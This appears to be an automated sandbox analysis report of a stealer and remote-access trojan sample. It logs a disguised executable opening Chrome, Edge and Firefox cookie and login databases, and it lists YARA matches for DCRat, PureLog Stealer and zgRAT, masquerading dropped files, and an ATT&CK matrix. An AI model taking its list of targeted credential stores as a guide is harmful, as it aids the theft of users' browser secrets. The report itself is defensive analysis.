                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal

                              Remote Access Functionality

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000022.00000002.2932291233.000000000392E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000022.00000002.2932291233.0000000003C03000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000022.00000002.2932291233.000000000354A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1753825476.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: r6cRyCpdfS.exe PID: 7268, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: rCdgcwByUDmMcQzYkDZywyWr.exe PID: 2188, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: smartscreen.exe PID: 7376, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: r6cRyCpdfS.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.r6cRyCpdfS.exe.330000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1658435835.0000000000332000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\smartscreen.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\WmiPrvSE.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: r6cRyCpdfS.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.r6cRyCpdfS.exe.330000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Program Files (x86)\jDownloader\smartscreen.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\rCdgcwByUDmMcQzYkDZywyWr.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\WmiPrvSE.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting                              		Valid Accounts241
                              Windows Management Instrumentation                              		1
                              Scripting                              		1
                              DLL Side-Loading                              		1
                              Disable or Modify Tools                              		1
                              OS Credential Dumping                              		2
                              File and Directory Discovery                              		1
                              Taint Shared Content                              		11
                              Archive Collected Data                              		1
                              Encrypted Channel                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Scheduled Task/Job                              		1
                              DLL Side-Loading                              		12
                              Process Injection                              		1
                              Deobfuscate/Decode Files or Information                              		LSASS Memory134
                              System Information Discovery                              		Remote Desktop Protocol1
                              Data from Local System                              		2
                              Non-Application Layer Protocol                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAt1
                              Scheduled Task/Job                              		1
                              Scheduled Task/Job                              		1
